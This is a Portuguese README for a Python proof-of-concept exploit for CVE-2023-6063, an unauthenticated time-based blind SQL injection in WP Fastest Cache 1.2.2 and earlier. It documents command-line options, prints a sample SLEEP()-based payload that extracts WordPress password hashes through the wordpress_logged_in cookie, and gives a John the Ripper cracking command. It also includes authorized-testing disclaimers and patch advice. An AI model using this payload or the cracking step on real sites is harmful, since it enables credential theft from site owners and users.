
PoC em Python para CVE-2023-6063, uma injeção SQL cega baseada em tempo e não autenticada no WP Fastest Cache <=1.2.2, que extrai hashes de senha e e-mails do WordPress.
Prova de Conceito (PoC) para CVE-2023-6063, uma vulnerabilidade de injeção SQL cega baseada em tempo, não autenticada, que afeta o WP Fastest Cache ≤ 1.2.2.
A vulnerabilidade pode ser acionada através do cookie wordpress_logged_in e pode permitir que um atacante infira informações sensíveis do banco de dados do WordPress, incluindo hashes de senha e endereços de e-mail.
Apenas para testes de segurança autorizados e fins educacionais.
Teste de injeção SQL cega baseada em tempo.
Extração de dados caractere por caractere usando atrasos SLEEP() do SQL.
Direcionamento a um nome de usuário específico do WordPress.
Validação opcional de hash de senha.
Extração opcional de e-mail.
Suporte a cookie personalizado.
Atraso de resposta configurável.
Modo de depuração para solução de problemas.
Extração seletiva usando:
--just-hash--just-emailDependendo da configuração do alvo e do conteúdo do banco de dados, a PoC pode extrair:
wp_users.user_pass.wp_users.user_email.Instale as dependências Python necessárias:
pip install -r requirements.txt
python3 poc.py -u https://vulnerable-website.example --username admin --delay 5
Substitua a URL de exemplo por um sistema que você está explicitamente autorizado a testar.
-h, --help
Mostra a mensagem de ajuda e sai.
-u URL, --url URL
URL completa da instalação do WordPress a ser testada.
--username USERNAME
Especifica o nome de usuário do WordPress cujas informações devem ser testadas.
-d DELAY, --delay DELAY
Atraso de resposta usado para testes baseados em tempo.
Padrão: 5 segundos.
Mínimo: 2 segundos.
-H HASH, --hash HASH
Hash a ser verificado na tabela wp_users.
Se o hash contiver caracteres especiais, coloque-o entre aspas simples.
--domain DOMAIN
Domínio usado para validação de e-mail.
-c COOKIE, --cookie COOKIE
Especifica um nome de cookie personalizado se o alvo usar um contexto diferente.
--status-code STATUS_CODE
Especifica o código de status HTTP positivo esperado.
Padrão: 200.
--debug
Habilita saída adicional de depuração.
--just-hash
Extrai apenas o hash de senha.
--just-email
Extrai apenas o endereço de e-mail.
CVE-2023-6063 afeta as versões do WP Fastest Cache ≤ 1.2.2.
A vulnerabilidade é uma injeção SQL cega não autenticada que pode ser acionada através do cookie wordpress_logged_in.
O problema pode ser explorado para realizar inferência baseada em tempo contra o banco de dados do WordPress. Ao medir diferenças nos tempos de resposta HTTP, caracteres individuais de valores do banco de dados podem potencialmente ser inferidos sem receber diretamente os dados consultados na resposta HTTP.
Um exemplo simplificado da técnica subjacente é:
" AND (IF(
(SELECT user_pass
FROM wp_users
WHERE user_login="admin") LIKE 'a%',
SLEEP(5),
0
))-- -
Se a condição testada for avaliada como verdadeira, o banco de dados introduz um atraso. Repetir esse processo com caracteres diferentes permite que informações sejam inferidas caractere por caractere.
| Propriedade de Segurança | Impacto |
|---|---|
| Confidencialidade | Alto |
| Integridade | Nenhum |
| Disponibilidade | Nenhum |
Informações potencialmente expostas incluem hashes de senha de usuários do WordPress e endereços de e-mail.
A demonstração a seguir mostra a PoC sendo usada contra um ambiente de teste autorizado:
Quando um hash de senha do WordPress foi obtido legitimamente durante uma avaliação de segurança autorizada, ferramentas de auditoria de senhas como John the Ripper ou Hashcat podem ser usadas para avaliar a força da senha.
Por exemplo, com o John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
Realize auditoria de senhas apenas contra hashes que você está autorizado a possuir e testar.
WP Fastest Cache:
≤ 1.2.2
A mitigação recomendada é atualizar o WP Fastest Cache para uma versão que contenha a correção de segurança.
Medidas defensivas adicionais incluem:
Recomendado: Atualizar o WP Fastest Cache para 1.2.3 ou posterior.
Este projeto é fornecido apenas para fins educacionais e pesquisa de segurança autorizada.
Não use esta PoC contra sistemas, sites, aplicações ou infraestrutura sem permissão explícita do proprietário.
O autor não é responsável por uso indevido, danos, perda de dados, acesso não autorizado ou quaisquer outras consequências resultantes do uso deste software.
Teste apenas sistemas que você possui ou tem autorização explícita para avaliar.
Este projeto é distribuído sob a GNU General Public License v3.0 (GPLv3).
| Propriedade | Detalhes |
|---|
| CVE | CVE-2023-6063 |
| CVSS | 7.5 — Alto |
| Vulnerabilidade | Injeção SQL Cega |
| Tipo de Injeção | Baseada em Tempo |
| Autenticação | Não necessária |
| Software Afetado | WP Fastest Cache |
| Versões Afetadas | ≤ 1.2.2 |
| Vetor de Ataque | Remoto |